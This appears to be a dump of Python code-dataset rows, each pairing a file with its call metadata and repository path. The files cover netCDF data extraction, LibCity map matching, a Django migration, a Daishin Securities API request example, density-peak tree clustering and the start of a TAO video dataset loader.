do_extract(exist_cdfs, output_cdf, **vars(args))
# Copy the resulting output CDF back
logger.info("Saving output file...")
shutil.copy(output_cdf, args.outcdf)
logger.info("Finished.")
else:
do_extract(args.incdf, args.outcdf, **vars(args))
def do_extract(exist_cdfs, output_cdf, **kwargs):
args = Namespace(**kwargs)
logger.info("Determining scope of work...")
indata = MFDataset(exist_cdfs) if len(exist_cdfs) > 1 else Dataset(exist_cdfs[0])
node_ids = get_node_ids(args.domain_node_shapefiles, args.masked_nodes_file)
logger.info("Initializing output file...")
if not os.path.exists(output_cdf):
outdata = init_output(output_cdf, indata, node_ids, **vars(args))
outdata['time'][:] = indata['time'][:] / 3600 / 24
else:
outdata = append_output(output_cdf)
init_output_vars(outdata, **vars(args))
# Attempts to use the entire MFDataset don't seem to scale well.
# Instead, I'm resorting to a blocking approach where MFDatasets are
# created for only a few netCDF files at a time
indata.close()
i = 0
total = 0
logger.info("Beginning extraction...")
start_time = time.perf_counter()
times_ct = outdata.dimensions['time'].size
for cdfchunk in chunks(exist_cdfs, args.chunk_size):
c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0])
chunk_times = len(c.dimensions['time'])
data = copy_data(c, outdata, i, node_ids, **vars(args))
i += chunk_times
c.close()
elapsed = (time.perf_counter() - start_time)
to_go = elapsed * (times_ct / i - 1)
total += np.sum([d.size * d.itemsize for k,d in data.items()])
logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i,
times_ct, int(elapsed), int(to_go), int(total/elapsed/1000)))
logger.info("Extraction finished.")
outdata.close()
def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs):
args = Namespace(**kwargs)
times_ct = len(cdfin.dimensions['time'])
alldata = {}
# Copy zeta if it's needed
if 'zeta' in cdfout.variables:
alldata['zeta'] = cdfin['zeta'][:, node_ids - 1]
cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta']
for var, attr in args.input_vars:
out_name = args.outprefix + var
if attr == InputAttr.ALL:
slc = slice(None)
elif attr == InputAttr.BOTTOM:
slc = -1
out_name += "_bottom"
# TODO add "photic" case which will look rather different
data = cdfin[var][:, slc, node_ids - 1]
logger.debug("data is shape " + str(data.shape))
if attr == InputAttr.ALL:
cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data
else:
cdfout[out_name][timeidx:timeidx+times_ct,:] = data
alldata[out_name] = data
return alldata
if __name__ == "__main__": main()
| [((17, 9, 17, 36), 'logging.getLogger', 'logging.getLogger', ({(17, 27, 17, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((32, 19, 32, 37), 'numpy.loadtxt', 'np.loadtxt', ({(32, 30, 32, 36): 'masked'}, {}), '(masked)', True, 'import numpy as np\n'), ((43, 11, 43, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((44, 13, 44, 37), 'netCDF4.Dataset', 'Dataset', ({(44, 21, 44, 31): 'output_cdf', (44, 33, 44, 36): '"""w"""'}, {}), "(output_cdf, 'w')", False, 'from netCDF4 import Dataset, MFDataset\n'), ((68, 11, 68, 35), 'netCDF4.Dataset', 'Dataset', ({(68, 19, 68, 29): 'output_cdf', (68, 31, 68, 34): '"""a"""'}, {}), "(output_cdf, 'a')", False, 'from netCDF4 import Dataset, MFDataset\n'), ((71, 11, 71, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((104, 13, 104, 84), 'argparse.ArgumentParser', 'ArgumentParser', (), '', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((134, 4, 134, 80), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((158, 11, 158, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((177, 17, 177, 36), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n'), ((196, 11, 196, 30), 'argparse.Namespace', 'Namespace', ({}, {}), '(**kwargs)', False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((22, 13, 22, 31), 'geopandas.read_file', 'gpd.read_file', ({(22, 27, 22, 30): 'shp'}, {}), '(shp)', True, 'import geopandas as gpd\n'), ((103, 34, 103, 60), 'os.path.realpath', 'os.path.realpath', ({(103, 51, 103, 59): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((160, 13, 160, 34), 'netCDF4.MFDataset', 'MFDataset', ({(160, 23, 160, 33): 'exist_cdfs'}, {}), '(exist_cdfs)', False, 'from netCDF4 import Dataset, MFDataset\n'), ((160, 63, 160, 85), 'netCDF4.Dataset', 'Dataset', ({(160, 71, 160, 84): 'exist_cdfs[0]'}, {}), '(exist_cdfs[0])', False, 'from netCDF4 import Dataset, MFDataset\n'), ((163, 11, 163, 37), 'os.path.exists', 'os.path.exists', ({(163, 26, 163, 36): 'output_cdf'}, {}), '(output_cdf)', False, 'import os\n'), ((112, 61, 112, 74), 'argparse.FileType', 'FileType', ({(112, 70, 112, 73): '"""r"""'}, {}), "('r')", False, 'from argparse import ArgumentParser, Namespace, FileType\n'), ((126, 30, 126, 73), 'os.path.join', 'os.path.join', ({(126, 43, 126, 54): 'script_home', (126, 56, 126, 72): 'masked_nodes_txt'}, {}), '(script_home, masked_nodes_txt)', False, 'import os\n'), ((132, 39, 132, 82), 'os.path.join', 'os.path.join', ({(132, 52, 132, 63): 'script_home', (132, 65, 132, 81): 'domain_nodes_shp'}, {}), '(script_home, domain_nodes_shp)', False, 'import os\n'), ((138, 13, 138, 42), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ({}, {}), '()', False, 'import tempfile\n'), ((146, 15, 146, 42), 'os.path.exists', 'os.path.exists', ({(146, 30, 146, 41): 'args.outcdf'}, {}), '(args.outcdf)', False, 'import os\n'), ((152, 12, 152, 48), 'shutil.copy', 'shutil.copy', ({(152, 24, 152, 34): 'output_cdf', (152, 36, 152, 47): 'args.outcdf'}, {}), '(output_cdf, args.outcdf)', False, 'import shutil\n'), ((180, 12, 180, 31), 'netCDF4.MFDataset', 'MFDataset', ({(180, 22, 180, 30): 'cdfchunk'}, {}), '(cdfchunk)', False, 'from netCDF4 import Dataset, MFDataset\n'), ((180, 58, 180, 78), 
'netCDF4.Dataset', 'Dataset', ({(180, 66, 180, 77): 'cdfchunk[0]'}, {}), '(cdfchunk[0])', False, 'from netCDF4 import Dataset, MFDataset\n'), ((187, 19, 187, 38), 'time.perf_counter', 'time.perf_counter', ({}, {}), '()', False, 'import time\n'), ((143, 16, 143, 44), 'shutil.copy', 'shutil.copy', ({(143, 28, 143, 34): 'infile', (143, 36, 143, 43): 'newpath'}, {}), '(infile, newpath)', False, 'import shutil\n'), ((145, 46, 145, 75), 'os.path.basename', 'os.path.basename', ({(145, 63, 145, 74): 'args.outcdf'}, {}), '(args.outcdf)', False, 'import os\n'), ((148, 16, 148, 52), 'shutil.copy', 'shutil.copy', ({(148, 28, 148, 39): 'args.outcdf', (148, 41, 148, 51): 'output_cdf'}, {}), '(args.outcdf, output_cdf)', False, 'import shutil\n'), ((142, 47, 142, 71), 'os.path.basename', 'os.path.basename', ({(142, 64, 142, 70): 'infile'}, {}), '(infile)', False, 'import os\n')] |
nadiaaaaachen/Bigscity-LibCity | libcity/executor/map_matching_executor.py | d8efd38fcc238e3ba518c559cc9f65b49efaaf71 | from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
class MapMatchingExecutor(AbstractTraditionExecutor):
def __init__(self, config, model):
self.model = model
self.config = config
self.evaluator = get_evaluator(config)
self.evaluate_res_dir = './libcity/cache/evaluate_cache'
self._logger = getLogger()
def evaluate(self, test_data):
"""
use model to test data
Args:
test_data
"""
result = self.model.run(test_data)
batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
self.evaluator.collect(batch)
self.evaluator.save_result(self.evaluate_res_dir)
def train(self, train_dataloader, eval_dataloader):
"""
        Traditional (non-learning) models do not require training, so this is a no-op.
Args:
train_dataloader(torch.Dataloader): Dataloader
eval_dataloader(torch.Dataloader): Dataloader
"""
pass # do nothing
| [((11, 25, 11, 46), 'libcity.utils.get_evaluator', 'get_evaluator', ({(11, 39, 11, 45): 'config'}, {}), '(config)', False, 'from libcity.utils import get_evaluator\n'), ((13, 23, 13, 34), 'logging.getLogger', 'getLogger', ({}, {}), '()', False, 'from logging import getLogger\n')] |
sujeethiremath/Project-1 | project1/budget/migrations/0005_delete_hiddenstatus_budget.py | 7f0bff66287d479e231e123615f2df18f9107178 | # Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('budget', '0004_auto_20200407_2356'),
]
operations = [
migrations.DeleteModel(
name='HiddenStatus_Budget',
),
]
| [((13, 8, 15, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations\n')] |
mssung94/daishin-trading-system | tutorial/43.py | d6682495afb7a08e68db65537b1d1789f2996891 | # Daishin Securities API
# Example comparing the two ways of requesting data: BlockRequest vs. Request
# There are broadly two ways to request data through the Plus API:
#
# BlockRequest method - the simplest way to request and receive data
# Request method - call Request, then receive the data through the OnReceived event
#
# The code below is an example that lets you compare the two approaches.
# For ordinary data requests, the BlockRequest method is the simplest.
# However, BlockRequest also pumps messages internally, so if real-time quotes arrive
# or another event triggers a recursive call before the request completes, the call may fail.
# When you need to communicate while receiving heavy real-time quotes, use the Request method instead.
import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event
g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')
StopEvent = win32event.CreateEvent(None, 0, 0, None)
class CpEvent:
def set_params(self, client, name, caller):
        self.client = client # CP real-time communication object
        self.name = name # name used to tell this service's events apart from others
        self.caller = caller # kept for callback use
def OnReceived(self):
        # real-time handling - current price / order execution
if self.name == 'stockmst':
            print('received')
win32event.SetEvent(StopEvent)
return
class CpCurReply:
def __init__(self, objEvent):
self.name = "stockmst"
self.obj = objEvent
def Subscribe(self):
handler = win32com.client.WithEvents(self.obj, CpEvent)
handler.set_params(self.obj, self.name, None)
def MessagePump(timeout):
waitables = [StopEvent]
while 1:
rc = win32event.MsgWaitForMultipleObjects(
waitables,
0, # Wait for all = false, so it waits for anyone
timeout, # (or win32event.INFINITE)
win32event.QS_ALLEVENTS) # Accepts all input
if rc == win32event.WAIT_OBJECT_0:
# Our first event listed, the StopEvent, was triggered, so we must exit
print('stop event')
break
elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
# A windows message is waiting - take care of it. (Don't ask me
# why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
# This message-serving MUST be done for COM, DDE, and other
# Windowsy things to work properly!
print('pump')
if pythoncom.PumpWaitingMessages():
break # we received a wm_quit message
elif rc == win32event.WAIT_TIMEOUT:
print('timeout')
return
pass
else:
print('exception')
raise RuntimeError("unexpected win32wait return value")
code = 'A005930'
##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('Data received via BlockRequest')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # closing price
item['대비'] = objStockMst.GetHeaderValue(12) # change vs. previous day
print(item)
print('')
##############################################################
# 2. Request ==> message pump ==> receive data in the OnReceived event
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11) # closing price
item['대비'] = objStockMst.GetHeaderValue(12) # change vs. previous day
print(item)
| [((23, 12, 23, 52), 'win32event.CreateEvent', 'win32event.CreateEvent', ({(23, 35, 23, 39): 'None', (23, 41, 23, 42): '0', (23, 44, 23, 45): '0', (23, 47, 23, 51): 'None'}, {}), '(None, 0, 0, None)', False, 'import win32event\n'), ((53, 13, 57, 36), 'win32event.MsgWaitForMultipleObjects', 'win32event.MsgWaitForMultipleObjects', ({(54, 12, 54, 21): 'waitables', (55, 12, 55, 13): '0', (56, 12, 56, 19): 'timeout', (57, 12, 57, 35): 'win32event.QS_ALLEVENTS'}, {}), '(waitables, 0, timeout, win32event.\n QS_ALLEVENTS)', False, 'import win32event\n'), ((36, 12, 36, 42), 'win32event.SetEvent', 'win32event.SetEvent', ({(36, 32, 36, 41): 'StopEvent'}, {}), '(StopEvent)', False, 'import win32event\n'), ((70, 15, 70, 46), 'pythoncom.PumpWaitingMessages', 'pythoncom.PumpWaitingMessages', ({}, {}), '()', False, 'import pythoncom\n')] |
SuilandCoder/ADPTC_LIB | ADPTC_LIB/DPTree_ST.py | ef5c2b7fcf117c8c90a3841489471289ecbf4562 | #%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time
def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix):
'''
    dc_eps: density-connectivity threshold
    Splits clusters using the direct parent-child distance together with the
    connectivity distance between a child node and its sibling nodes;
    the mean density is used to separate outliers.
    (A usage sketch follows this function.)
    Returns:
        outlier_forest
        cluster_forest
        uncertain_forest
'''
mean_density = np.mean(local_density)
outlier_forest = {}
cluster_forest = {}
uncertain_forest = {}
not_direct_reach = []
    #* find the points that are not directly reachable:
for k in range(len(closest_denser_nodes_id)):
near_nodes = mixin_near_matrix[k]
if closest_denser_nodes_id[k] not in near_nodes:
not_direct_reach.append(k)
pass
not_direct_reach = np.array(not_direct_reach)
# not_direct_reach = np.where(closest_dis_denser>eps)[0]
    #* order the not-directly-reachable points by their depth in the tree:
# not_direct_reach = np.array(not_direct_reach)
depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16)
for i in range(len(not_direct_reach)):
# depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0)
pass
not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
    #* emulate a stack: process the deepest nodes first
    start = time.perf_counter()
while(len(not_direct_reach)>0):
        #* connectivity check: distance below the threshold and density above the subtree's mean density
node_id = not_direct_reach.pop()
if(node_id==129193 or node_id==61589 or node_id == 123593):
print(node_id)
if node_id in tree.sorted_gamma_index[0:10]:
cluster_forest[node_id] = tree.remove_subtree(node_id)
continue
node = tree.node_dir[node_id]
parent_id = node.parent_id
parent_node = tree.node_dir[parent_id]
children = parent_node.getChildren()
        siblings_reliable = [ i for i in children if i not in not_direct_reach] #* sibling nodes, excluding those that are not directly reachable
not_reliable_nodes = [i for i in children if i not in siblings_reliable]
if node_id in not_reliable_nodes:
not_reliable_nodes.remove(node_id)
if node_id in siblings_reliable:
siblings_reliable.remove(node_id)
pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix)
if len(pairs_nodes)==0:
if(node_id==tree.root_node.node_id):
continue
if(local_density[node_id]-mean_density*dc_eps)>=0:
                #* count this node's offspring:
offspring_id = tree.get_subtree_offspring_id(node_id,[node_id])
if(len(offspring_id)<local_density[node_id]):
uncertain_forest[node_id] = tree.remove_subtree(node_id)
pass
else:
cluster_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
else:
outlier_forest[node_id] = tree.remove_subtree(node_id)
pass
pass
pass
    end = time.perf_counter()
    print('Tree splitting took %s s' % str(end - start))
    cluster_forest[tree.root_node.node_id] = tree #* add the tree rooted at the root node
return outlier_forest, cluster_forest, uncertain_forest
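# A minimal end-to-end sketch (hypothetical driver, not part of the original module): the three
# forests returned by split_cluster_new() are normally handed straight to label_these_node_new()
# (defined further below) to turn the tree split into per-sample labels and core points.
def _example_split_and_label(tree, local_density, dc_eps, closest_denser_nodes_id, mixin_near_matrix):
    outliers, clusters, uncertain = split_cluster_new(
        tree, local_density, dc_eps, closest_denser_nodes_id, mixin_near_matrix)
    labels, core_points = label_these_node_new(
        outliers, clusters, len(local_density), uncertain, mixin_near_matrix)
    return labels, core_points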
def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix):
'''
    cur_node: the point whose connectivity with the parent node is being evaluated;
    reliable_nodes: sibling nodes that are directly connected to the parent;
    not_reliable_nodes: sibling nodes that are not directly connected to the parent, but may be connected indirectly;
    Connectivity check:
    1. Check whether cur_node can reach any of reliable_nodes; if so, return; otherwise go to 2;
    2. Check whether cur_node can reach not_reliable_nodes (say [a,b,c,d,e]); if it reaches [a,b,c] but not [d,e], go to 3;
    3. Loop over [a,b,c] and call this method recursively, e.g. is_connected_new(..., cur_node_id=a, reliable_nodes, not_reliable_nodes=[b,c,d,e])
'''
#* 1.
if(len(reliable_nodes)==0):
return []
for reliable_node_id in reliable_nodes:
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix)
if(len(pairs_nodes)==0):
continue
# return pairs_nodes
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
pass
#* 2.
for i in range(len(not_reliable_nodes)):
pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix)
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
else:
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
# return pairs_nodes
            # #* if the mean density of the connected points exceeds the local-density threshold, update the maximum similarity
cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
local_density_connected_nodes = np.mean(local_density[connected_nodes])
if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
return pairs_nodes
if(len(pairs_nodes)==0):
pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
if(len(pairs_nodes)>0):
return pairs_nodes
# pass
return []
def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix):
'''
    Label the sample points in each forest;
    also handles the assignment of uncertain points.
'''
labels = np.full((node_num),-1,dtype=np.int32)
for outlier_id in outlier_forest:
outlier_tree = outlier_forest[outlier_id]
outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id])
labels[outlier_idlist] = -1
pass
label = 0
for tree_id in cluster_forest:
cluster_tree = cluster_forest[tree_id]
cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id])
labels[cluster_idlist] = label
label = label + 1
pass
    #todo revise this code
for uncertain_tree_id in uncertain_forest:
uncertain_tree = uncertain_forest[uncertain_tree_id]
uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id])
all_near_nodes = np.array([],dtype=np.int32)
for node_id in uncertain_nodes_id:
all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id])
pass
# all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
all_near_nodes = np.unique(all_near_nodes)
all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)]
unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True)
if(len(counts)==0):
cur_label = -1
else:
cur_label = unique_labels[np.argmax(counts)]
labels[uncertain_nodes_id]=cur_label
pass
core_points = cluster_forest.keys()
return labels,core_points
'''
Density-peak tree;
builds a DPTree from the local density, the distance to the nearest higher-density neighbor, and the decision metric (gamma) produced by the CFSFDP algorithm;
'''
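# A build sketch under assumed inputs (defined here only as an example and never called):
# X holds the samples, local_density and closest_dis_denser come from CFSFDP, closest_node_id
# is each point's nearest higher-density neighbor, and gamma is the decision metric; the names
# mirror createTree()'s parameters, and DPTree/Node are defined below.
def _example_build_dptree(X, closest_node_id, closest_dis_denser, local_density, gamma):
    sorted_gamma_index = np.argsort(-gamma)  # highest-gamma point becomes the root
    tree = DPTree()
    tree.createTree(X, sorted_gamma_index, closest_node_id, closest_dis_denser, local_density, gamma)
    return tree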
class Node():
def __init__(self,node_id,attr_list,parent_id=None,dist_to_parent=None,density=None,gamma=None,children=[]):
self.node_id = node_id
self.attr_list = attr_list
self.parent_id = parent_id
self.dist_to_parent = dist_to_parent
self.density = density
self.children = children
self.gamma = gamma
self.offspring_num = None
self.lvl = None
def addChild(self,child):
self.children+=[child]
def removeChild(self,child):
self.children.remove(child)
def resetChildren(self):
self.children = []
def setParentId(self,parent_id):
self.parent_id = parent_id
def setOffspringNum(self,num):
self.offspring_num = num
def setLvl(self,lvl):
self.lvl = lvl
def getAttr(self):
return self.attr_list
def getNodeId(self):
return self.node_id
def getParentId(self):
return self.parent_id
def getDistToParent(self):
return self.dist_to_parent
def getDensity(self):
return self.density
def getGamma(self):
return self.gamma
def getChildren(self):
return self.children
def hasChildren(self,child_id):
if child_id in self.children:
return True
else:
return False
def getOffspringNum(self):
return self.offspring_num
def getLvl(self):
return self.lvl
class DPTree():
def __init__(self):
self.node_count = 0
self.node_dir = {}
self.root_node = None
self.node_offspring = {}
self.sorted_gamma_index = None
pass
def createTree(self,X,sorted_gamma_index,closest_node_id,closest_dis_denser,local_density,gamma):
        #* create the nodes in gamma order
node_dir = {}
node_created = np.zeros(len(sorted_gamma_index))
self.sorted_gamma_index = sorted_gamma_index
for i in range(len(sorted_gamma_index)):
node_id = sorted_gamma_index[i]
            parent_id = closest_node_id[node_id] #* closest_node_id is derived from the sorted gamma
attr_list = X[node_id]
dist_to_parent = closest_dis_denser[node_id]
density = local_density[node_id]
if(node_created[node_id]==0):
                node = Node(node_id,attr_list,parent_id,dist_to_parent=dist_to_parent,density=density,gamma=gamma[node_id],children=[])
node_created[node_id] = 1
node_dir[node_id] = node
node_dir[node_id].setParentId(parent_id)
if(node_created[parent_id]==0):
parent_node = Node(parent_id,X[parent_id],parent_id=None,dist_to_parent=closest_dis_denser[parent_id],density=local_density[parent_id],gamma=gamma[parent_id],children=[])
node_created[parent_id] = 1
node_dir[parent_id] = parent_node
parent_node = node_dir[parent_id]
cur_node = node_dir[node_id]
            if(node_id != parent_id):#* not the root node
parent_node.addChild(node_id)
# parent_lvl = parent_node.getLvl()
# cur_node.setLvl(parent_lvl+1)
else:
if(parent_node.getLvl()==None):
parent_node.setLvl(0)
        #* set the node level information
# for i in tree.node_dir:
# pass
self.root_node = node_dir[sorted_gamma_index[0]]
self.node_dir = node_dir
self.node_count = len(sorted_gamma_index)
pass
def printTree2(self,parent_id,spaceStr=''):
for node_id in self.node_dir:
if(node_id==self.root_node.node_id):
continue
node = self.node_dir[node_id]
if(node.parent_id==parent_id):
print(spaceStr, node.node_id, sep = '')
self.printTree2(node.node_id,spaceStr+' ')
pass
def calcu_subtree_offspring_num(self,node_id):
node = self.node_dir[node_id]
cur_offsprings = node.getOffspringNum()
if(cur_offsprings!=None):
return cur_offsprings
child_num = len(node.children)
if(child_num==0):
return 0
for i in node.children:
cur_offsprings = self.calcu_subtree_offspring_num(i)
child_num+=cur_offsprings
node.setOffspringNum(child_num)
return child_num
def get_subtree_offspring_id(self,node_id,other_idlist):
'''
        Get the node_id of every descendant node.
        (Consider whether this should be cached as a node attribute.)
'''
def fn_get_subtree_offspring_id(node_id,offspring_idlist):
if(node_id in self.node_offspring.keys()):
return self.node_offspring[node_id]
else:
node = self.node_dir[node_id]
children = node.getChildren()
child_num = len(children)
if(child_num==0):
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist= list(offspring_idlist) + children
for i in children:
child_offspring_idlist = fn_get_subtree_offspring_id(i,[])
self.node_offspring[i] = child_offspring_idlist
offspring_idlist= list(offspring_idlist) + child_offspring_idlist
pass
self.node_offspring[node_id] = offspring_idlist
return offspring_idlist
offspring_idlist = fn_get_subtree_offspring_id(node_id,[])
return np.array(list(offspring_idlist) + other_idlist)
def calcu_subtree_entropy(self,offspring_id,local_density,closest_dis_denser):
p_sum = np.sum(local_density[offspring_id]/closest_dis_denser[offspring_id])
p = (local_density[offspring_id]/closest_dis_denser[offspring_id])/p_sum
entropy = -1*np.sum(p*np.log2(p))
        #* return 0 when there is only a single point
if(entropy==0):
return 0
return entropy/(-1*np.log2(1/(len(offspring_id))))
def remove_subtree(self,child_id):
'''
        Remove the subtree rooted at child_id from its parent node_id; the removed subtree becomes a new tree and is returned
        1. update self.node_dir and self.node_count
        2. update the parent's children[] and every ancestor's offspring_num
        3. build the new tree
'''
# print("删除子节点:",child_id)
offspring_id = self.get_subtree_offspring_id(child_id,[child_id])
offspring_len = len(offspring_id)
node_id = self.node_dir[child_id].parent_id
node = self.node_dir[node_id]
node.removeChild(child_id)
self.node_count = self.node_count-offspring_len
        #* drop the cached descendant nodes
if(node_id in self.node_offspring.keys()):
for node_to_delete in offspring_id:
self.node_offspring[node_id].remove(node_to_delete)
print("删除子孙节点:",node_to_delete)
pass
pass
# cur_id = child_id
# parent_id = node_id
        # #* update the ancestors' offspring_num:
# while(cur_id!=parent_id):
# parent_node = self.node_dir[parent_id]
# if(parent_node.getOffspringNum()!=None):
# parent_node.setOffspringNum(parent_node.getOffspringNum()-offspring_len)
# cur_id = parent_id
# parent_id = parent_node.parent_id
# pass
        #* update self.node_dir and build the new tree:
new_tree = DPTree()
for i in offspring_id:
removed_node = self.node_dir.pop(i)
new_tree.node_dir[i] = removed_node
pass
new_tree.node_count = offspring_len
new_tree.root_node = new_tree.node_dir[child_id]
new_tree.root_node.setParentId(child_id)
return new_tree
def calcu_dist_betw_subtree(self,node_id_one,node_id_two,dist_mat,eps):
'''
        Compute the connectivity distance between two subtrees
        return:
            1. the shortest distance
            2. the set of points closer than the distance threshold
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = float('inf')
for i in offspring_two:
tmp_dist = np.min(dist_mat[i][offspring_one])
if(tmp_dist<dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]<eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_neighbor_btw_subtree(self,node_id_one,node_id_two,mixin_near_matrix):
'''
        Find the neighboring points between two subtrees
        return:
            the pairs of neighboring points
            all neighboring points
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
pairs_nodes = []
for i in offspring_two:
connected_nodes_index = np.intersect1d(mixin_near_matrix[i],offspring_one)
if len(connected_nodes_index)>0:
for j in connected_nodes_index:
pairs_nodes.append([i,j])
pass
pass
if(len(pairs_nodes)==0):
return pairs_nodes,connected_nodes
return np.array(pairs_nodes), np.unique(np.array(pairs_nodes).flatten())
def calcu_dist_betw_subtree_entropy(self,node_id_one,node_id_two,dist_mat,eps):
'''
        Compute the connectivity (similarity) distance between two subtrees
        return:
            1. the maximum similarity distance
            2. the set of points whose similarity exceeds the threshold
'''
connected_nodes = np.array([],dtype=np.int32)
offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
dist = -1
for i in offspring_two:
tmp_dist = np.max(dist_mat[i][offspring_one])
if(tmp_dist>=dist):
dist = tmp_dist
pass
connected_nodes_index = np.where(dist_mat[i][offspring_one]>=eps)[0]
if len(connected_nodes_index)>0:
connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
pass
return dist, np.unique(connected_nodes)
def calcu_depth(self,node_id, depth):
node = self.node_dir[node_id]
parent_id = node.parent_id
if(node_id==parent_id):
return depth
else:
return self.calcu_depth(parent_id,depth+1)
| [] |
Nik-V9/AirObject | datasets/tao/tao.py | 5937e64531f08449e81d2c90e3c6643727efbaf0 | from __future__ import print_function
import sys
sys.path.append('.')
import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data
__all__ = ["TAO"]
class TAO(data.Dataset):
r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_. Will fetch sequences of
rgb images, instance segmentation labels, SuperPoint features (optional).
Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:
.. code-block::
sequence0
┎───────────────┲───────────────┲───────────────┒
| | | |
frame0 frame1 frame2 frame3 frame4 frame5 frame6 frame7 frame8 frame9 frame10 frame11 ...
| | | |
└───────────────┵───────────────┵────────────────┚
sequence1
Args:
basedir (str): Path to the base directory containing the directories from TAO.
videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
be path to a `.txt` file where each line is a Video Seqeunce name, a tuple of scene names.
seqlen (int): Number of frames to use for each sequence of frames. Default: 4
